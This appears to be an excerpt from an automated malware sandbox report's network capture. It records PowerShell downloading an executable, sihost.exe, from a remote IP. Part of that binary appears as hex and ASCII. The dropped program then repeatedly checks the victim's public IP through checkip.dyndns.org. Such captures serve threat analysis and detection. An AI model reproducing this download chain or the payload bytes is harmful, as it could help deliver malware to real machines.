                                    Data Ascii: 2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%250
                                    Aug 13, 2024 20:24:29.440998077 CEST896INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25
                                    Aug 13, 2024 20:24:29.441030025 CEST1236INData Raw: 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 32 38 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35
                                    Data Ascii: 2509%2509%2509%2509%2509%2509%2509%2509%2528%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%250
                                    Aug 13, 2024 20:24:29.441065073 CEST1236INData Raw: 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30
                                    Data Ascii: 509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509
                                    Aug 13, 2024 20:24:29.441099882 CEST448INData Raw: 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30
                                    Data Ascii: 509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509
                                    Aug 13, 2024 20:24:29.441142082 CEST1236INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2526%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25
                                    Aug 13, 2024 20:24:29.441179991 CEST1236INData Raw: 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35
                                    Data Ascii: 2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%250
                                    Aug 13, 2024 20:24:29.446197987 CEST1236INData Raw: 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32 35 30 39 25 32
                                    Data Ascii: %2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%25


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.2249165192.3.176.138803096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:36.824924946 CEST333OUTGET /40/sihost.exe HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 192.3.176.138
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:24:37.305928946 CEST1236INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:37 GMT
                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                    Last-Modified: Tue, 13 Aug 2024 12:53:46 GMT
                                    ETag: "c0000-61f9019a8bcbf"
                                    Accept-Ranges: bytes
                                    Content-Length: 786432
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/lnk
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 fc 56 bb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 0a 00 00 12 01 00 00 00 00 00 fe 0a 0b 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a8 0a 0b 00 53 00 00 00 00 20 0b 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELVf @ `@S @ H.text `.rsrc @@.reloc@@BH,0A P%( B%1(2(*&*~**~**"(*0{%( c, : 6 5 6 (*&*0~2~E~:
                                    Aug 13, 2024 20:24:37.305984974 CEST1236INData Raw: 1f 24 91 1f 12 59 0c 2b d2 d0 02 00 00 02 28 06 00 00 0a 25 0a 28 07 00 00 0a 17 13 05 11 05 45 06 00 00 00 27 00 00 00 00 00 00 00 21 00 00 00 27 00 00 00 3d 00 00 00 4c 00 00 00 7e 03 00 00 04 2d 0d 09 1f 50 91 09 1f 1c 91 59 13 05 2b cd 11 06
                                    Data Ascii: $Y+(%(E'!'=L~-PY+v Y+(soW SY+t(E+&ddY+*&*Np0V
                                    Aug 13, 2024 20:24:37.306021929 CEST1236INData Raw: 13 04 2b a1 11 05 1f 3f 91 2b f5 14 0b 1e 13 04 2b 93 02 8c 04 00 00 1b 6f 10 00 00 0a 0b 1e 13 04 38 7f ff ff ff 06 17 58 0a 04 25 5a 0c 04 08 58 0c 1f 09 13 04 38 6a ff ff ff 08 18 5d 2d 08 18 13 04 38 5d ff ff ff 17 2b f6 07 74 02 00 00 1b 2a
                                    Data Ascii: +?++o8X%ZX8j]-8]+t*1 Y8A^}((*0s.o**0s"o*0so*0~2EFR
                                    Aug 13, 2024 20:24:37.306054115 CEST1236INData Raw: 08 58 08 5d 08 58 08 5d 13 0b 1f 26 13 26 38 b7 fc ff ff 16 13 17 11 27 20 26 01 00 00 91 1f 0c 59 13 26 38 a2 fc ff ff 00 11 17 13 19 11 19 13 18 11 18 2c 09 1f 21 13 26 38 8c fc ff ff 11 28 20 9b 00 00 00 93 20 d5 90 00 00 59 2b e9 11 18 17 2e
                                    Data Ascii: X]X]&&8' &Y&8,!&8( Y+.( HY&8e+(s +Y&8P6&8C(T =Y&8-X.&8-&8( 3 gY+]X]8&8]
                                    Aug 13, 2024 20:24:37.306086063 CEST1236INData Raw: 2e 00 00 01 02 7e 08 00 00 04 72 4f 01 00 70 28 13 00 00 06 13 24 11 24 6f 30 00 00 0a 26 11 27 20 b1 00 00 00 91 1f 09 5a 13 26 38 c6 f7 ff ff 02 7b 0d 00 00 04 20 a4 00 00 00 1f 1a 73 1c 00 00 0a 6f 1d 00 00 0a 00 02 7b 0d 00 00 04 19 6f 1e 00
                                    Data Ascii: .~rOp($$o0&' Z&8{ so{o'?X&8{rqpo"A"As1(2' 'OY&8X(3 H }s(4&81(5{o6(5{o60&8
                                    Aug 13, 2024 20:24:37.306117058 CEST1236INData Raw: 13 0a 1d 13 14 2b c8 11 08 75 3e 00 00 01 11 0a 74 05 00 00 1b 16 11 0b 20 be 00 00 00 20 e6 00 00 00 28 08 00 00 2b 11 09 75 3e 00 00 01 11 0a 75 05 00 00 1b 16 11 0a 75 05 00 00 1b 8e 69 20 9d 03 00 00 20 de 03 00 00 28 09 00 00 2b 25 13 0b 16
                                    Data Ascii: +u>t (+u>uui (+%08s 0Y+[E44(u>,/ Y+ 3zY+t>oE3S'K
                                    Aug 13, 2024 20:24:37.306150913 CEST1236INData Raw: 00 02 7b 16 00 00 04 25 6f 48 00 00 0a 28 4b 00 00 0a 28 4c 00 00 0a 6f 1f 00 00 0a 00 16 0c 1c 13 05 2b 92 00 02 7b 16 00 00 04 25 6f 48 00 00 0a 07 08 8f 05 00 00 01 28 4d 00 00 0a 28 4c 00 00 0a 6f 1f 00 00 0a 18 13 05 38 67 ff ff ff 00 00 08
                                    Data Ascii: {%oH(K(Lo+{%oH(M(Lo8gX )Y8Li-8:+**0~2~EU":\$, Y++{+,
                                    Aug 13, 2024 20:24:37.306184053 CEST1236INData Raw: 38 66 fc ff ff 00 02 72 65 02 00 70 28 1b 00 00 0a 00 02 72 65 02 00 70 6f 1f 00 00 0a 00 02 16 28 38 00 00 0a 1f 0f 0b 38 3e fc ff ff 00 02 28 39 00 00 0a 00 2a 00 00 5e 02 14 7d 19 00 00 04 02 28 11 00 00 0a 00 00 02 28 29 00 00 06 00 2a 0a 00
                                    Data Ascii: 8frep(repo(88>(9*^}(()****0c~E?.{rupo{rypo [+{ r}po*01~2~ED
                                    Aug 13, 2024 20:24:37.306217909 CEST1236INData Raw: 0a 7d 1d 00 00 04 02 73 4e 00 00 0a 7d 1e 00 00 04 02 73 4e 00 00 0a 7d 1f 00 00 04 02 73 4e 00 00 0a 7d 20 00 00 04 1f 0f 0b 38 e4 fe ff ff 02 73 4e 00 00 0a 7d 21 00 00 04 02 73 17 00 00 0a 7d 22 00 00 04 02 73 16 00 00 0a 7d 23 00 00 04 02 28
                                    Data Ascii: }sN}sN}sN} 8sN}!s}"s}#(8{o*{ Jso8{r7po{ so A Y8L{o{rpo # `Y
                                    Aug 13, 2024 20:24:37.306255102 CEST1236INData Raw: 00 0a 6f 2c 00 00 0a 09 1f 10 91 0b 38 2e fa ff ff 00 02 7b 22 00 00 04 20 c1 00 00 00 1f 17 73 19 00 00 0a 6f 1a 00 00 0a 00 02 7b 22 00 00 04 72 f5 03 00 70 6f 1b 00 00 0a 1f 26 0b 38 fd f9 ff ff 00 02 7b 22 00 00 04 20 99 00 00 00 1f 18 73 1c
                                    Data Ascii: o,8.{" so{"rpo&8{" so{"o8{"rpo{# jso8{#rpo{#oso ]Y8d{#o{#r'
                                    Aug 13, 2024 20:24:37.311693907 CEST1236INData Raw: 11 04 45 0c 00 00 00 3d 00 00 00 88 00 00 00 58 00 00 00 88 00 00 00 0b 00 00 00 81 00 00 00 36 00 00 00 3d 00 00 00 00 00 00 00 13 00 00 00 6d 00 00 00 6d 00 00 00 d0 2d 00 00 06 26 1a 13 04 2b be 16 0a 1f 09 13 04 2b b6 03 02 61 1f 0d 59 06 61
                                    Data Ascii: E=X6=mm-&++aYaE 1Y+++( gXY8qX%ZX8\]-8O;+u*88}$}%(+(2*0]


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.2249166158.101.44.242803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:45.808808088 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:24:46.440718889 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:46 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 56cec0bf300908b11d092cb1850f20db
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:46.618900061 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:46 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 56cec0bf300908b11d092cb1850f20db
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:47.210365057 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:47.409513950 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:47 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: ff0eb99a6dfa77c7ebc699ad59351b7d
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:47.619086981 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:47 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: ff0eb99a6dfa77c7ebc699ad59351b7d
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:49.747220039 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:49.919338942 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:49 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 8fd8e363e8dd2f1d57f82b96946683df
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:50.130877972 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:49 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 8fd8e363e8dd2f1d57f82b96946683df
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    4192.168.2.2249169193.122.130.0803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:51.603991032 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:52.089013100 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:52 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: fbeb8a6a337909399d6762c9843b814b
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:52.301074028 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:52 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: fbeb8a6a337909399d6762c9843b814b
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    5192.168.2.2249171193.122.130.0803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:53.001559019 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:53.459078074 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:53 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 8532cb543857205b0b5fe13fdd825c33
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:53.666979074 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:53 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 8532cb543857205b0b5fe13fdd825c33
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.2249173158.101.44.242803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:54.363729954 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:54.947009087 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:54 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 55fd7faebf9777aadaa69826141967d0
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:55.151087999 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:54 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 55fd7faebf9777aadaa69826141967d0
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.2249175193.122.6.168803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:56.312563896 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:56.965333939 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:56 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: dafe15f829fefa575cb91340d295f6ef
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:57.178963900 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:56 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: dafe15f829fefa575cb91340d295f6ef
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
